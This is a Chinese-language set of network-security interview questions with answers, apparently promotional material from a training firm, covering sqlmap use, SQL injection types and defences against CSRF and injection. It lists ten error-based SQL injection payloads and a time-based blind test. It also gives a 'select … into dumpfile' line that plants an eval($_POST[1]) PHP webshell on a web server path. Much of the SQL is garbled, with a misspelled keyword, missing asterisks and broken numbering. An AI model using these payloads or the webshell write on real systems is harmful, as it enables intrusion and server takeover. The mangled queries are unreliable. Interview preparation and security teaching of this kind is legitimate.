【汇总】网络安全常见面试题(二)
1、sqlmap,怎么对一个注入点注入?
1)如果是 get 型号,直接,sqlmap -u "诸如点网址".
2) 如果是 post 型诸如点,可以 sqlmap -u "注入点网址” --data="post 的参数"
3)如果是 cookie,X-Forwarded-For 等,可以访问的时候,用 burpsuite 抓包,注入处用号替换,放到文件里,然后 sqlmap -r "文件地址"
2、sql 注入的几种类型?
1)报错注入
2)bool 型注入
3)延时注入
4)宽字节注入
3、报错注入的函数有哪些?10 个
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】2)通过 floor 报错 向下取整 3)
+and
updatexml(1, concat(0x7e,(secect @@version),0x7e),1)4).geometrycollection()select from
test
where id=1 and geometrycollection((select from(selectfrom(select
user())a)b));5).multipoint()select from test where id=1 and
multipoint((select from(select
from(select
user())a)b));6).polygon()select from test where
id=1 and polygon((select
from(select
from(select user())a)b));7).multipolygon()select from test where id=1 and
multipolygon((select from(select from(select user())a)b));8).linestring()select from test
where id=1 and linestring((select from(select
from(select
user())a)b));9).multilinestring()select from
test where id=1 and multilinestring((select
from(select from(select user())a)b));10).exp()select from test where id=1 and exp(~(select
* from(select user())a));
4、延时注入如何来判断?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
5、如何拿一个网站的 webshell?
上传,后台编辑模板,sql 注入写文件,命令执行,代码执行, 一些已经爆出的 cms 漏洞,比如 dedecms 后台可以直接建立脚本文件,wordpress 上传插件包含脚本文件 zip 压缩包等
6、sql 注入写文件都有哪些函数?
select '一句话' into
outfile '路径'select '一句话' into dumpfile '路径'select '
eval($_POST[1]) ?>'
into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';
7、如何防止 CSRF?
1,验证 referer
2,验证 token
8、owasp 漏洞都有哪些?
1)SQL 注入防护方法:
2)失效的身份认证和会话管理
3)跨站脚本攻击 XSS
4)直接引用不安全的对象
5)安全配置错误
6)敏感信息泄露
7)缺少功能级的访问控制
8)跨站请求伪造 CSRF
9)使用含有已知漏洞的组件
9、未验证的重定向和转发49、SQL 注入防护方法?
1)使用安全的 API
2)对输入的特殊字符进行 Escape 转义处理
3)使用白名单来规范化输入验证方法
4)对客户端输入进行控制,不允许输入 SQL 注入相关的特殊字符
5)服务器端在提交数据库进行 SQL 查询之前,对特殊字符进行过滤、转义、替换、删除。
更多关于网络安全培训的问题,欢迎咨询千锋教育在线名师。千锋教育拥有多年IT培训服务经验,采用全程面授高品质、高体验培养模式,拥有国内一体化教学管理及学员服务,助力更多学员实现高薪梦想。
